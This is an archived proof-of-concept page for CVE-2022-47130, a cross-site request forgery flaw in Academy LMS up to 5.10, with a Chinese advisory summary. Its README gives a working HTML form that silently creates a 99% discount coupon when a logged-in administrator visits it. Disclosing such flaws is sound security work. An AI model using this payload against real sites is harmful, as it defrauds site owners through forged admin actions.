CVE-2022-47130 PoC — Academy Learning Management System 跨站请求伪造漏洞

Source

https://github.com/OpenXP-Research/CVE-2022-47130

Associated Vulnerability

Title:Academy Learning Management System 跨站请求伪造漏洞 (CVE-2022-47130)
Description:Academy Learning Management System是Creativeitem团队的一个学院学习管理系统。 Academy Learning Management Systemv5.10之前版本存在安全漏洞，攻击者利用该漏洞可以在与页面进行交互时创建折扣券。

Description

Academy LMS <= 5.10 CSRF

Readme

# CVE-2022-47130
Academy LMS &lt;= 5.10 CSRF

# Description
Academy LMS is an application where people can create and advertise courses. The add a coupon feature is vulnerable to CSRF as there is no token which causes this attack to be avoided.

# Proof of Concept (POC)
The first step to our proof of concept is to authenticate to the platform with administrative user.

After that, just access the page that contains the code for exploiting the vulnerability, check it out that a new coupon was created automatically.

Code used in the exploit:

```html
<html>
   <body>
   <script>history.pushState('', '', '/')</script>
     <form action="https://target.com/admin/coupons/add" method="POST">
       <input type="hidden" name="code" value="vinix" />
       <input type="hidden" name="discount&#95;percentage" value="99" />
       <input type="hidden" name="expiry&#95;date" value="12&#47;11&#47;2022" />
       <input type="submit" value="Submit request" />
     </form>
   </body>
</html>
```

File Snapshot


 [4.0K]  /data/pocs/e6c981c18ac393fc9bfa28f30a7b51ab7fa9ffba
└── [ 997]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!